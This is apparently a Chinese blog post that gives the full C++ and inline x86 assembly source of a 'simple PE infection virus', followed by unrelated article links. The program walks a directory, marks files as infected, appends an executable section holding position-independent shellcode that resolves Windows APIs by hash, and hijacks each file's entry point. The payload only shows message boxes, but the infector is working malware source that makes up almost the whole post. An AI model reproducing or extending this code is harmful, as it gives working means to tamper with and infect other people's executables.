GVFDBDF
GVFDBDF

一个简单的PE感染病毒

/*----------2015-09-28 Update ----------*/

将shellcode多线程执行

使用CreateThread函数开辟子线程

子线程会开辟新的堆栈,需要进行新的压栈和函数寻找


#pragma region shellcode
	__asm{
		
		/*-----ShellCode主线程------*/
		shellStart: 
			nop
			nop
			nop
			nop
			nop
			CLD					; clear flag DF
		
		;store hash
			push 0x1e380a6a		;hash of MessageBoxA
			//push 0x4fd18963		;hash of ExitProcess
			push 0x2729f8bb		;hash of CreateThread
			push 0x0c917432		;hash of LoadLibraryA
			mov esi,esp			; esi = addr of first function hash 
			lea edi,[esi-0xc]	; edi = addr to start writing function 


		; make some stack space
			xor ebx,ebx
			mov bh, 0x04 			 
			sub esp, ebx 
			
		
		; push a pointer to "user32" onto stack 
			mov bx, 0x3233 		; rest of ebx is null 
			push ebx 
			push 0x72657375 
			push esp 
			
			xor edx,edx


		; find base addr of kernel32.dll 
			mov ebx, fs:[edx + 0x30] 	; ebx = address of PEB 
			mov ecx, [ebx + 0x0c] 		; ecx = pointer to loader data 
			mov ecx, [ecx + 0x1c] 		; ecx = first entry in initialisation order list         
			mov ecx,[ecx]                  ; ---win7多此一步
			mov ecx, [ecx] 				; ecx = second entry in list (kernel32.dll) 
			mov ebp, [ecx + 0x08] 		; ebp = base address of kernel32.dll
			
						
		find_lib_functions: 
		
			lodsd 					; load next hash into al and increment esi 
			cmp eax, 0x1e380a6a		; hash of MessageBoxA - trigger 
									; LoadLibrary("user32") 
			jne find_functions 
			xchg eax, ebp 			; save current hash 
			call [edi - 0x8] 		; LoadLibraryA 
			xchg eax, ebp 			; restore current hash, and update ebp 
									; with base address of user32.dll 
			
			//找到函数名表的绝对地址
		find_functions: 
			pushad 						; preserve registers 
			mov eax, [ebp + 0x3c]		; eax = start of PE header 
			mov ecx, [ebp + eax + 0x78]	; ecx = relative offset of export table 
			add ecx, ebp 				; ecx = absolute addr of export table 
			mov ebx, [ecx + 0x20] 		; ebx = relative offset of names table 
			add ebx, ebp 				; ebx = absolute addr of names table 
			xor edi, edi 				; edi will count through the functions 


			//指向函数名表中的下一个函数
		next_function_loop: 
			inc edi 					; increment function counter 
			mov esi, [ebx + edi * 4] 	; esi = relative offset of current function name 
			add esi, ebp 				; esi = absolute addr of current function name 
			cdq 						; dl will hold hash (we know eax is small) 
			

			//对所指向的函数进行hash循环
		hash_loop: 
			movsx eax, byte ptr[esi]
			cmp al,ah
			jz compare_hash
			ror edx,7
			add edx,eax
			inc esi
			jmp hash_loop


		compare_hash:	
			cmp edx, [esp + 0x1c] 		; compare to the requested hash (saved on stack from pushad) 
			jnz next_function_loop 
			
		 
			mov ebx, [ecx + 0x24] 		; ebx = relative offset of ordinals table 
			add ebx, ebp 				; ebx = absolute addr of ordinals table 
			mov di, [ebx + 2 * edi] 	; di = ordinal number of matched function 
			mov ebx, [ecx + 0x1c] 		; ebx = relative offset of address table 
			add ebx, ebp 				; ebx = absolute addr of address table 
			add ebp, [ebx + 4 * edi] 	; add to ebp (base addr of module) the 
										; relative offset of matched function 
			xchg eax, ebp 				; move func addr into eax 
			pop edi 					; edi is last onto stack in pushad 
			stosd 						; write function addr to [edi] and increment edi 
			push edi 
			popad						; restore registers 
					 					; loop until we reach end of last hash 
			cmp eax,0x1e380a6a
			jne find_lib_functions 


		CreateThread_call:
			call reset
		reset:
			pop ebx
			sub ebx,offset reset
			lea eax, [ebx + MessageBox_call]
			
			xor ebx,ebx
			
			push ebx
			push ebx			 
			push ebx
			push eax
			push ebx     
			push ebx
			call [edi-0x08]		

			xor ebx,ebx
			push ebx			 // cut string '\0'
			push 0x21
			push 0xa7cbc3ba
			push 0xdac0c2ba      //push 郝磊好帅!
			
			push ebx
			push 0x5151
			push 0xd4d7b4c0		 //push 来自QQ

			mov eax,esp			 //load address of failwest
			push ebx	
			push eax
			add eax,12
			push eax 
			push ebx
			call [edi-0x04]		;//call MessageboxA
			
//-----------------------------------------------------------------//
		/*-------ShellCode子线程--------*/
		MessageBox_call:
			nop
			nop
			nop
			nop
			nop
			CLD					; clear flag DF
		;store hash
			push 0x1e380a6a		;hash of MessageBoxA
			//push 0x4fd18963		;hash of ExitProcess
			push 0x2729f8bb		;hash of CreateThread
			push 0x0c917432		;hash of LoadLibraryA
			mov esi,esp			; esi = addr of first function hash 
			lea edi,[esi-0xc]	; edi = addr to start writing function 

	
		; make some stack space
			xor ebx,ebx
			mov bh, 0x04 			 
			sub esp, ebx 
			
		
		; push a pointer to "user32" onto stack 
			mov bx, 0x3233 		; rest of ebx is null 
			push ebx 
			push 0x72657375 
			push esp 
			
			xor edx,edx


		; find base addr of kernel32.dll 
			mov ebx, fs:[edx + 0x30] 	; ebx = address of PEB 
			mov ecx, [ebx + 0x0c] 		; ecx = pointer to loader data 
			mov ecx, [ecx + 0x1c] 		; ecx = first entry in initialisation order list         
			mov ecx,[ecx]                  ; ---win7多此一步
			mov ecx, [ecx] 				; ecx = second entry in list (kernel32.dll) 
			mov ebp, [ecx + 0x08] 		; ebp = base address of kernel32.dll
			
						
		find_lib_functions2: 
		
			lodsd 					; load next hash into al and increment esi 
			cmp eax, 0x1e380a6a		; hash of MessageBoxA - trigger 
									; LoadLibrary("user32") 
			jne find_functions2 
			xchg eax, ebp 			; save current hash 
			call [edi - 0x8] 		; LoadLibraryA 
			xchg eax, ebp 			; restore current hash, and update ebp 
									; with base address of user32.dll 
			
			//找到函数名表的绝对地址
		find_functions2: 
			pushad 						; preserve registers 
			mov eax, [ebp + 0x3c]		; eax = start of PE header 
			mov ecx, [ebp + eax + 0x78]	; ecx = relative offset of export table 
			add ecx, ebp 				; ecx = absolute addr of export table 
			mov ebx, [ecx + 0x20] 		; ebx = relative offset of names table 
			add ebx, ebp 				; ebx = absolute addr of names table 
			xor edi, edi 				; edi will count through the functions 


			//指向函数名表中的下一个函数
		next_function_loop2: 
			inc edi 					; increment function counter 
			mov esi, [ebx + edi * 4] 	; esi = relative offset of current function name 
			add esi, ebp 				; esi = absolute addr of current function name 
			cdq 						; dl will hold hash (we know eax is small) 
			

			//对所指向的函数进行hash循环
		hash_loop2: 
			movsx eax, byte ptr[esi]
			cmp al,ah
			jz compare_hash2
			ror edx,7
			add edx,eax
			inc esi
			jmp hash_loop2

		compare_hash2:	
			cmp edx, [esp + 0x1c] 		; compare to the requested hash (saved on stack from pushad) 
			jnz next_function_loop2 
			
		 
			mov ebx, [ecx + 0x24] 		; ebx = relative offset of ordinals table 
			add ebx, ebp 				; ebx = absolute addr of ordinals table 
			mov di, [ebx + 2 * edi] 	; di = ordinal number of matched function 
			mov ebx, [ecx + 0x1c] 		; ebx = relative offset of address table 
			add ebx, ebp 				; ebx = absolute addr of address table 
			add ebp, [ebx + 4 * edi] 	; add to ebp (base addr of module) the 
										; relative offset of matched function 
			xchg eax, ebp 				; move func addr into eax 
			pop edi 					; edi is last onto stack in pushad 
			stosd 						; write function addr to [edi] and increment edi 
			push edi 
			popad						; restore registers 
					 					; loop until we reach end of last hash 
			cmp eax,0x1e380a6a
			jne find_lib_functions2 
			

			xor ebx,ebx
			push ebx			// cut string
			push 0x21
			push 0xa7cbfcb8
			push 0xf1c9c2d5      //push 章神更帅!
			
			push ebx
			push 0x5151
			push 0xd4d7b4c0

			mov eax,esp			//load address of failwest
			push ebx	
			push eax
			add eax,12
			push eax 
			push ebx
			call [edi-0x04] ;	//call MessageboxA
			//push ebx
			//call [edi - 0x08] ; // call ExitProcess
			
			nop
			nop
		    mov eax,0x12345678		;//任意地址,会被PE原入口地址覆盖
            jmp eax
	}





/-------

通过开辟一个新的节表放置shellcode

修改PE入口点到shellcode,并在shellcode中设置返回原PE入口点


2015-09-20       peic


PE文件格式参考资料:

http://bbs.pediy.com/showthread.php?t=21932

----------/


/***
	本程序只适用于载入基址定位的,非随机基址
	感染指定目录的PE文件
	添加了一个新节区
	弹出一个窗口
	2015.9.21		peic
***/


#pragma once
#include <Windows.h>
#include <stdio.h>
#include <assert.h>
#include <iostream>
using namespace std;

#define _MAX_PATH_ 100
#define INFECT_FLAG 0x1301C06		//19930118
char Location[_MAX_PATH_] = "d:\\Users\\Itachi\\Desktop\\PE";


//设置字节对齐
DWORD Align(DWORD size, DWORD Alignment)
{
	//Alignment不能为0
	assert(0 != Alignment);
	if(size % Alignment)
	{
		//size大小应该为内存中区块对齐值Alignment的整数倍,如果不是整数倍则扩充到整数倍
		//内存:Alignment = 0100h = 4KB
		//文件:Alignment = 200h = 512B
		size = (size / Alignment + 1) * Alignment;
	}
	return size;
}



//设置、检测感染标识,返回PE是否被感染
//将PE中的保留空间用来设置感染标识
//PIMAGE_DOS_HEADER是_IMAGE_DOS_HEADER这个结构体的指针
//函数传入的参数是PIMAGE_DOS_HEADER这个类型指针的地址,&进行引用传递表示形参的改变会影响到实参
BOOL SetInfectFlag(PIMAGE_DOS_HEADER &pDosHeader)
{
	if(*(DWORD*)pDosHeader->e_res2 == INFECT_FLAG)
	{
		printf("This PE file has been infected!\n");
		return FALSE;	//被感染
	}
	else
	{
		*(DWORD*)pDosHeader->e_res2 = INFECT_FLAG;
		return TRUE;	//未被感染
	}
}



//检查是否为PE文件,传入参数为OpenFile保存的文件内存映射地址lpMemory
BOOL IsPeFile(LPVOID lpMemory)
{
	//判断DOS的MZ头
	IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)lpMemory;
	if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
	{
		printf("This file is not a PE file !\n");
		return FALSE;
	}

	//判断NT的PE头
	IMAGE_NT_HEADERS* pNtHeader = (IMAGE_NT_HEADERS*)((PBYTE)lpMemory + pDosHeader->e_lfanew);
	if(pNtHeader->Signature != IMAGE_NT_SIGNATURE)
	{
		printf("This file is not a PE file !\n");
		return FALSE;
	}

	return TRUE;
}



//清理函数
void CloseAll(LPVOID &lpMemory, HANDLE &hFile, HANDLE &hMap)
{
	CloseHandle(hFile);
	CloseHandle(hMap);
	UnmapViewOfFile(lpMemory);
}



//打开文件,传入文件的绝对地址(引用传递)
//保存文件内存映射地址:lpMemory
BOOL OpenFile(char* szPath, LPVOID &lpMemory, HANDLE &hFile, HANDLE &hMap)
{
	//打开文件,得到一个文件的句柄
	hFile = CreateFileA(szPath, GENERIC_READ|GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if(hFile == INVALID_HANDLE_VALUE)
	{
		printf("Can not open the file, ErrorCode = %d\n",GetLastError());
		UnmapViewOfFile(lpMemory);
		return FALSE;
	}

	//将文件映射到内存,创建文件映射对象,得到映射对象的句柄
	hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, NULL, NULL, NULL);
	if(!hMap)
	{
		printf("Can not created the file's MapObject! ErrorCode = %d\n", GetLastError());
		UnmapViewOfFile(lpMemory);
		CloseHandle(hFile);
		return FALSE;
	}

	//将文件数据对象映射到本进程的地址空间
	lpMemory = MapViewOfFile(hMap, FILE_MAP_READ|FILE_MAP_WRITE, NULL, NULL, NULL);
	if(!lpMemory)
	{
		printf("Can not Map the file to Memory! ErrorCode = %d\n", GetLastError());
		UnmapViewOfFile(lpMemory);
		CloseHandle(hFile);
		CloseHandle(hMap);
		return FALSE;
	}

	return TRUE;
}



//感染PE文件
void InfectPE(char *szPath)
{
	LPVOID lpMemory;
	HANDLE hFile;
	HANDLE hMap;
	PIMAGE_NT_HEADERS pNtHeader;
	PIMAGE_DOS_HEADER pDosHeader;
#pragma region perpare
	//打开文件
	if(!OpenFile(szPath, lpMemory, hFile,hMap))
	{
		return;
	}
	pDosHeader = (PIMAGE_DOS_HEADER)lpMemory;

	//判断是否为PE文件
	if(!IsPeFile(lpMemory))
	{
		CloseAll(lpMemory,hFile,hMap);
		return;
	}
	pNtHeader = (PIMAGE_NT_HEADERS)((DWORD)pDosHeader->e_lfanew + *(DWORD*)&pDosHeader);
	
	//设置感染标识,将文件标为感染了
	if(!SetInfectFlag(pDosHeader))
	{
		return;
	}

	//检查可用空间
	if((pNtHeader->FileHeader.NumberOfSections + 1) * sizeof(IMAGE_SECTION_HEADER) 
				> pNtHeader->OptionalHeader.SizeOfHeaders)
	{
		CloseAll(lpMemory,hFile,hMap);
		return;
	}
#pragma endregion


	//新添加一个节表项
	PIMAGE_SECTION_HEADER pSecHeader = (PIMAGE_SECTION_HEADER)(*(DWORD*)&pNtHeader + sizeof(IMAGE_NT_HEADERS32));
	PIMAGE_SECTION_HEADER pNewSecHeader = (PIMAGE_SECTION_HEADER)(pSecHeader + pNtHeader->FileHeader.NumberOfSections);
	PIMAGE_SECTION_HEADER pLastSecHeader = (PIMAGE_SECTION_HEADER)(pNewSecHeader - 1);


	/*** --------检查一直出错!!!!------------***

	//检查PE文件是否有附加数据
	DWORD index;
	//节区起始数据在文件中的偏移
	DWORD size = pSecHeader->PointerToRawData;
	for (index = 0; index < pNtHeader->FileHeader.NumberOfSections; index++)
	{
		size += Align(pSecHeader->SizeOfRawData, pNtHeader->OptionalHeader.FileAlignment);
	}
	//有附加数据则返回退出
	if(size != GetFileSize(hFile, 0))
	{
		return;		
	}
	*/


	/*弹出对话框shellcode*/
	goto shellEnd;

#pragma region shellcode
	__asm{
		shellStart: 
			nop
			nop
			nop
			nop
			nop
			CLD					; clear flag DF
		;store hash
			push 0x1e380a6a		;hash of MessageBoxA
			push 0x4fd18963		;hash of ExitProcess
			push 0x0c917432		;hash of LoadLibraryA
			mov esi,esp			; esi = addr of first function hash 
			lea edi,[esi-0xc]	; edi = addr to start writing function 

			

		; make some stack space
			xor ebx,ebx
			mov bh, 0x04 			 
			sub esp, ebx 
			


		
		; push a pointer to "user32" onto stack 
			mov bx, 0x3233 		; rest of ebx is null 
			push ebx 
			push 0x72657375 
			push esp 
			
			xor edx,edx


		; find base addr of kernel32.dll 
			mov ebx, fs:[edx + 0x30] 	; ebx = address of PEB 
			mov ecx, [ebx + 0x0c] 		; ecx = pointer to loader data 
			mov ecx, [ecx + 0x1c] 		; ecx = first entry in initialisation order list         
			mov ecx,[ecx]                  ; ---win7多此一步
			mov ecx, [ecx] 				; ecx = second entry in list (kernel32.dll) 
			mov ebp, [ecx + 0x08] 		; ebp = base address of kernel32.dll
			
						
		find_lib_functions: 
		
			lodsd 					; load next hash into al and increment esi 
			cmp eax, 0x1e380a6a		; hash of MessageBoxA - trigger 
									; LoadLibrary("user32") 
			jne find_functions 
			xchg eax, ebp 			; save current hash 
			call [edi - 0x8] 		; LoadLibraryA 
			xchg eax, ebp 			; restore current hash, and update ebp 
									; with base address of user32.dll 
			
			
		find_functions: 
			pushad 						; preserve registers 
			mov eax, [ebp + 0x3c]		; eax = start of PE header 
			mov ecx, [ebp + eax + 0x78]	; ecx = relative offset of export table 
			add ecx, ebp 				; ecx = absolute addr of export table 
			mov ebx, [ecx + 0x20] 		; ebx = relative offset of names table 
			add ebx, ebp 				; ebx = absolute addr of names table 
			xor edi, edi 				; edi will count through the functions 

		next_function_loop: 
			inc edi 					; increment function counter 
			mov esi, [ebx + edi * 4] 	; esi = relative offset of current function name 
			add esi, ebp 				; esi = absolute addr of current function name 
			cdq 						; dl will hold hash (we know eax is small) 
			
		hash_loop: 
			movsx eax, byte ptr[esi]
			cmp al,ah
			jz compare_hash
			ror edx,7
			add edx,eax
			inc esi
			jmp hash_loop

		compare_hash:	
			cmp edx, [esp + 0x1c] 		; compare to the requested hash (saved on stack from pushad) 
			jnz next_function_loop 
			
		 
			mov ebx, [ecx + 0x24] 		; ebx = relative offset of ordinals table 
			add ebx, ebp 				; ebx = absolute addr of ordinals table 
			mov di, [ebx + 2 * edi] 	; di = ordinal number of matched function 
			mov ebx, [ecx + 0x1c] 		; ebx = relative offset of address table 
			add ebx, ebp 				; ebx = absolute addr of address table 
			add ebp, [ebx + 4 * edi] 	; add to ebp (base addr of module) the 
										; relative offset of matched function 
			xchg eax, ebp 				; move func addr into eax 
			pop edi 					; edi is last onto stack in pushad 
			stosd 						; write function addr to [edi] and increment edi 
			push edi 
			popad						; restore registers 
					 					; loop until we reach end of last hash 
			cmp eax,0x1e380a6a
			jne find_lib_functions 

		function_call:
			xor ebx,ebx

			push ebx			 // cut string '\0'
			push 0x21
			push 0xa7cbc3ba
			push 0xdac0c2ba      //push 波哥好帅!
			
			push ebx
			push 0x5151
			push 0xd4d7b4c0		 //push 来自QQ

			mov eax,esp			 //load address of failwest
			push ebx	
			push eax
			add eax,12
			push eax 
			push ebx
			call [edi-0x04]		;//call MessageboxA
			
			xor ebx,ebx

			push ebx			// cut string
			push 0x21
			push 0xa7cbfcb8
			push 0xf1c9c2d5      //push 章神更帅!
			
			push ebx
			push 0x5151
			push 0xd4d7b4c0

			mov eax,esp			//load address of failwest
			push ebx	
			push eax
			add eax,12
			push eax 
			push ebx
			call [edi-0x04] ;	//call MessageboxA
			//push ebx
			//call [edi - 0x08] ; // call ExitProcess
			
			nop
			nop
		    mov eax,0x12345678		;//任意地址,会被PE原入口地址覆盖
            jmp eax
	}
#pragma endregion

	shellEnd:
	PBYTE* pShell;
	DWORD nShellLen;
	
	__asm
	{
		lea eax,shellStart
		mov pShell,eax
		lea ebx,shellEnd
		sub ebx,eax
		mov nShellLen,ebx
	}


	/*--------设置新节区的各个参数字段-------------*/
	memcpy(pNewSecHeader->Name, ".PEIC", 5);
	
	//新节区起始文件的偏移
	pNewSecHeader->PointerToRawData = 
		pLastSecHeader->PointerToRawData + Align(pLastSecHeader->SizeOfRawData, pNtHeader->OptionalHeader.FileAlignment);
	//新节区的内存地址
	pNewSecHeader->VirtualAddress = 
		pLastSecHeader->VirtualAddress + Align(pLastSecHeader->Misc.VirtualSize, pNtHeader->OptionalHeader.SectionAlignment);
	
	//新节区的大小
	DWORD dwPayLoadSize  = nShellLen;
	pNewSecHeader->Misc.VirtualSize = dwPayLoadSize;
	pNewSecHeader->SizeOfRawData = 
		Align(dwPayLoadSize, pNtHeader->OptionalHeader.FileAlignment);
	
	//设置新节区的属性
	pNewSecHeader->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE;
	
	//节区数目加1
	pNtHeader->FileHeader.NumberOfSections += 1;
	
	//修改PE大小
	//对齐后的节区总大小和PE映像装入内存后的总大小
	pNtHeader->OptionalHeader.SizeOfCode += 
		Align(pNewSecHeader->Misc.VirtualSize, pNtHeader->OptionalHeader.FileAlignment);
	pNtHeader->OptionalHeader.SizeOfImage += 
		Align(pNewSecHeader->SizeOfRawData, pNtHeader->OptionalHeader.SectionAlignment);

	//绑定导入表地址和大小清零
	pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress=0;
	pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size=0;
	
	
	//向PE中的新节区写入数据
	DWORD dwSize = 0;
	DWORD pFile = 0;
	//在文件中设置当前读写位置
	//从文件末尾开始开始计算偏移量
	pFile = SetFilePointer(hFile, 0, 0, FILE_END);
	//从文件指针指向的位置开始将数据写入到文件中
	WriteFile(hFile, pShell, nShellLen, &dwSize, NULL);		//如果写入成功,写入数据的大小将会保存在dwSize这个指针指向的内容中
	


	/*----改变PE的入口点---*/
	pFile = SetFilePointer(hFile, -6, 0, FILE_CURRENT);		//覆盖shellcode的返回地址,跳转回PE原入口点
	DWORD dwOldEntryPoint = pNtHeader->OptionalHeader.AddressOfEntryPoint + pNtHeader->OptionalHeader.ImageBase;
	WriteFile(hFile, &dwOldEntryPoint, 4, &dwSize, NULL);
	

	//写入剩余字节
	PBYTE pByte = (PBYTE)malloc(pNewSecHeader->SizeOfRawData-nShellLen);
	ZeroMemory(pByte, pNewSecHeader->SizeOfRawData-nShellLen);
	dwSize = 0;
	pFile = SetFilePointer(hFile, 0, 0, FILE_END);
	WriteFile(hFile, pByte, pNewSecHeader->SizeOfRawData-nShellLen, &dwSize, NULL);
	FlushFileBuffers(hFile);
	free(pByte);

	//设置新的PE入口点
	pNtHeader->OptionalHeader.AddressOfEntryPoint = pNewSecHeader->VirtualAddress;
	//printf("新入口点: %X\n", pNewSecHeader->VirtualAddress);

	system("pause");
	//清理后续工作
	FlushViewOfFile(lpMemory, pNtHeader->OptionalHeader.SizeOfHeaders);
	CloseAll(lpMemory,hFile,hMap);
}


//扫描查找要感染的PE文件
void FindFile(char *szPath)
{
	WIN32_FIND_DATAA FindFileData;
	char szFileToFind[MAX_PATH] = {0};
	lstrcpyA(szFileToFind, szPath);
	lstrcatA(szFileToFind,"\\NOTEPAD.EXE");

	//查找目录下所有的文件
	HANDLE hFindFile = FindFirstFileA(szFileToFind, &FindFileData);
	if(hFindFile == INVALID_HANDLE_VALUE)
	{
		printf("FindFirstFileA Failed!\n");
		return;
	}
	do
	{
		char szNewPath[MAX_PATH] = {0};
		lstrcpyA(szNewPath, szPath);
		
		//首先判断是否为目录
		if(FindFileData.dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY)
		{
			if(!lstrcmpA(FindFileData.cFileName, ".") || !lstrcmpA(FindFileData.cFileName, ".."))
			{}
			//查找下级目录
			else
			{
				lstrcatA(szNewPath,"\\");
				lstrcatA(szNewPath, FindFileData.cFileName);
				FindFile(szNewPath);
			}
		}
		//处理找到的文件
		else
		{
			char szPE[MAX_PATH] = {0};
			lstrcpyA(szPE,szNewPath);
			lstrcatA(szPE,"\\");
			lstrcatA(szPE,FindFileData.cFileName);
			//感染文件
			InfectPE(szPE);
		}
	}
	while(FindNextFileA(hFindFile,&FindFileData));
	
	FindClose(hFindFile);
}



int main()
{
	FindFile(Location);
	return 0;
}



你可能感兴趣的:(C语言,病毒,pe)

  • Linux离线安装Python chudu
    #下载openssl,如果不先安装openssl,后续pip、requests库使用会有很多问题wget--no-check-certificatehttps://www.openssl.org/source/openssl-1.1.1g.tar.gztar-zxvfopenssl-1.1.1g.tar.gzcdopenssl-1.1.1g./configshared--openssldir=/u
  • idea或datagrip连接opengauss数据库 文杰一米八 opengaussJavaintellij-idea数据库java
    1、使用pgsql来连接因为opengauss数据库基于pgsql实现,所以可以用pgsql的驱动来连接。但是连接的时候会报错。2、新建opengauss驱动所以在连的时候需要先建一个opengauss的driver。驱动文件可以在网上下载,也可以在pom里加上opengauss的依赖,org.opengaussopengauss-jdbc然后拉取jar。步骤如下:3、连接成功
  • TypeScript语言的字符串处理 轩辕烨瑾 包罗万象golang开发语言后端
    TypeScript语言的字符串处理在现代编程语言中,字符串处理是非常重要的一部分。对于TypeScript这样的语言,更是让开发者在处理字符串时得到了更为安全和强大的工具。本文将深入探讨TypeScript中的字符串处理技术,包括字符串的基本操作、模板字符串、字符串方法、正则表达式以及常用的字符串处理技巧等。一、TypeScript基础与字符串的基本操作TypeScript是JavaScript
  • C语言——课程实验报告 Tubishu 算法开发语言c语言
    任务一:将1,2,…,9共9个数分成3组,分别组成3个三位数,且使这3个三位数构成1:2:3的比例,试求出所有满足条件的3个三位数。输入格式无输出格式若干行,每行3个数字。按照每行第1个数字升序排列。输入无输出192384576…(每行***表示一个答案)#includeintmain(){inta,b,c;inti,j,s[9];for(a=100;a#includemain(){intflag
  • 《CPython Internals》阅读笔记:p329-p335 codists 读书笔记python
    《CPythonInternals》学习第16天,p329-p335总结,总计7页。一、技术总结1.debuggingp331,Therearetwotypesofdebugger,consoleandvisual——作者将debugger分为两类:(1)console:lldb(MAC系统使用),GDB(Linux系统使用))。(2)visual:VisualStudioDebugger,CLi
  • Spring---定时任务@Schedule的使用,及其参数使用yml或properties配置值 知北行 JavaSpringspringjava后端
    1.使用1.在spring的启动类上添加允许定时任务注解@EnableScheduling2.在要定时执行的方法上添加注解:@Scheduled(fixedRate=5000)//任务每隔5秒执行一次或@Scheduled(fixDelay=5000)//任务每隔5秒执行一次(上一次任务结束5秒后,再执行下一次任务)或者可以使用cron表达式来完成更复杂的定时要求.2.使用yml或properti
  • 如何用Netty实现一个负载均衡组件 youyouiknow tech-reviewjava后端架构
    一、总体架构一个基本的负载均衡组件通常包含以下几个核心模块:服务注册与发现(ServiceRegistry&Discovery):功能:维护可用的后端服务实例列表(例如IP地址和端口)。实现要点:注册:服务实例启动时,将自己注册到注册中心。发现:负载均衡器从注册中心获取服务实例列表。健康检查:定期检查服务实例的健康状态,剔除不健康的实例。可选技术:ZooKeeper,etcd,Consul,Nac
  • 如何禁用OpenAI的并行工具调用 hgSdaegva java前端javascriptpython
    在使用OpenAI提供的API进行开发时,我们可能会碰到工具调用默认是并行执行的场景。这意味着如果我们询问类似“东京、纽约和芝加哥的天气如何?”的问题,并且我们有一个获取天气的工具,OpenAI将会同时对这三个城市分别发起调用。然而,在某些开发场景中,我们可能希望限制工具调用的并行性,比如在顺序依赖较强的任务中,或者对于某些需要节约资源的场景。本文将通过代码示例,详细讲解如何禁用并行工具调用。核心
  • jvm-sandbox-repeater安装与使用指南 裴剑苹
    jvm-sandbox-repeater安装与使用指南项目地址:https://gitcode.com/gh_mirrors/jv/jvm-sandbox-repeater1、项目的目录结构及介绍jvm-sandbox-repeater作为阿里巴巴开源的一款基于JVM-Sandbox的流量录制与回放解决方案,在其源码仓库中拥有清晰的目录结构,具体解析如下:bin:包含一系列辅助脚本,如instal
  • Linux(CA证书颁发机构) Jackson~Y 网络系统管理服务器运维linux
    赛题拓扑:题目:CA(证书颁发机构)CA根证书路径/csk-rootca/csk-ca.pem。签发数字证书,颁发者信息:(仅包含如下信息)C=CNST=ChinaL=BeiJingO=skillsOU=OperationsDepartmentsCN=CSKGlobalRootCA[root@appsrv~]#vim/etc/pki/tls/openssl.cnfdir=/csk-rootca修改
  • Java算法栈 王景程 java开发语言算法数据结构
    栈作为编程中一个常见的算法,以下是它的特征以及一个相对应的例子:在编程中,**栈(Stack)**是一种后进先出(LIFO,LastInFirstOut)数据结构。它的特性是:入栈(Push):将元素添加到栈顶。出栈(Pop):将栈顶元素移除。查看栈顶元素(Peek/Top):获取栈顶元素但不移除。Java提供了一个现成的Stack类,它是java.util包的一部分,可以直接用于算法问题中。算法
  • JVM学习指南(44)-JVM模块化 俞兆鹏 JVM学习指南JVM
    文章目录模块化概述模块化的重要性JVM模块化的历史背景Java模块化的演变模块化的关键概念模块(module)要求(requires)导出(exports)开放(opens)模块化的实际应用定义模块使用模块模块化的影响模块化的未来展望新特性和改进对Java生态系统的影响模块化概述在软件开发中,模块化是一种将复杂系统分解成更小、更易管理的部分的方法。这种分解不仅有助于提高代码的可读性和可维护性,还能
  • 开源的未来 10 年:中国开源社区建立是关键 开源社
    开源社KAIYUANSHE以下文章来源于CSDN,作者陈绪[CSDN.成就一亿技术人](#)【CSDN编者按】从EricRaymond在自由软件的范畴下进一步提出OpenSource开源软件至今,已经过去30余年,今天,开源不仅完全渗透互联网,更成为众多IT公司的基石。不过,中国的开源一直却呈现着企业热使用热社区冷开发冷的景象,真正参与开源产品开发和社区贡献的开发者凤毛麟角。同时,在过去的一年多里
  • CS书籍、代码资源下载网址 sun_kang CSGuide&&Linkslinuxjavatutorialsdebiandocumentationlinux内核
    CS网址收藏啄木鸟Pythonic开源社区:http://www.woodpecker.org.cn/中国IT实验室(游戏开发):http://game.chinaitlab.com/游戏开发资源网:http://www.gameres.com/国内游戏开发论坛:http://bbs.gameres.com/国外的游戏开发站:http://www.gamedev.net/《问道》游戏开发论坛:ht
  • kotlin的协程的基础概念 小李飞飞砖 kotlin前端开发语言
    Kotlin的协程是一种用于简化异步编程的强大工具。理解协程的基础概念可以帮助开发者有效地利用其能力。以下是Kotlin协程的一些关键基础概念:协程(Coroutines):协程是一种用于处理并发任务的编程模型,它可以在单个线程内执行异步任务。与传统的线程相比,协程更加轻量级,可以高效地执行大量并发任务。挂起函数(SuspendFunctions):使用suspend关键字定义的函数,可以在不阻塞
  • (已解决)Failed to execute goal on project ...: Could not resolve dependencies for projec qq_40711092 问题记录java
    这样的错误,最后发现原来是自己没有首先对父项目也就是interface-test项目进行clean和install.https://blog.csdn.net/qq_43493747/article/details/120866443
  • Perl 语言入门学习 喵丶派对 适用的技巧perl
    Perl是一种自由和通用的脚本语言,特别适用于文本处理。它的设计者是LarryWall,最初是为了简化Unix系统管理任务而开发的。Perl具有丰富的正则表达式功能、内置的数据结构、强大的文件处理能力以及灵活的语法,使得它成为了许多系统管理员和网络管理员的首选工具。Perl的特点:简洁的语法:Perl的语法非常简单,易于学习和阅读。它的代码通常很紧凑,易于编写和维护。跨平台:Perl可以在几乎所有
  • MongoDB的聚合&MongoDB的索引 小强同志 MongoDbmongodbnosql数据库
    一、mongoDB的聚合操作知识点:pipeline聚合mapRedurce聚合pipeline与mapRedurce比较pipeline速度快,但只能运行在单机上,适合数据量小的实时聚合操作。mapRedurce可以运行在分布式节点,适适大数量并且复杂的聚合分析操作pipeline聚合pipeline聚合其特性是运行速度快,只能运行在单机上,并且对资源的使用有一定限制如下:单个的聚合操作耗费的内
  • docker起的geoserver怎么访问docker启动的postgis数据库 niuge No.1 docker数据库eureka
    背景:本地docker启动geoserver、pg数据库,pg数据库安装postgis拓展。第一步:查询docker启动的容器dockerps-a第二步:查询应用的ip如我的docker容器名称是第一步查询的postgres,那么查询的命令是:dockerinspect-f"{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}"postgr
  • arcgis js 怎么加载geoserver发布的wms服务 niuge No.1 1024程序员节
    arcgisjsapi加载wms服务,官方的参考样例:WMSLayer|SampleCode|ArcGISMapsSDKforJavaScript4.30|EsriDeveloper按照官方样例加载比较奇怪,我们平常习惯用url或者json的方式加载,稍微改一下就行,如下:constlayer=newWMSLayer({url:"http://127.0.0.1:8080/geoserver/ne
